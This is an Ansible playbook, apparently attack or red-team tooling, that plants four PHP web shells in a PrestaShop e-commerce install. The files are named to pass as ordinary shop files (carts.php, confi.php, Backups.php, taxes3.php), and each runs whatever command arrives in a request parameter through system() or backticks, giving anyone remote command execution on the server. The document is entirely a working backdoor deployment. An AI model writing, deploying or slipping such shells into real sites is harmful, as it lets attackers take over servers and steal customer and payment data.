- hosts: centosECOMM
  become: true
  ignore_errors: true
  tasks:

  - name: Create carts.php file
    copy:
      dest: /var/www/html/prestashop/carts.php
      content: <?php if(isset($_REQUEST['carts'])){ echo "<pre>"; $cmd = ($_REQUEST['carts']); system($cmd); echo "</pre>"; die; }?>
  - name: Create confi.php
    copy:
      dest: /var/www/html/prestashop/config/confi.php
      content: <?=`$_GET[_]`?> 
  - name: Create backups.php
    copy:
      dest: /var/www/html/prestashop/classes/Backups.php
      content: <?=`$_GET[backup]`?>
  - name: Create taxes3.php
    copy:
      dest: /var/www/html/prestashop/classes/tax/taxes3.php
      content: <?=`$_GET[tax]`?> 
       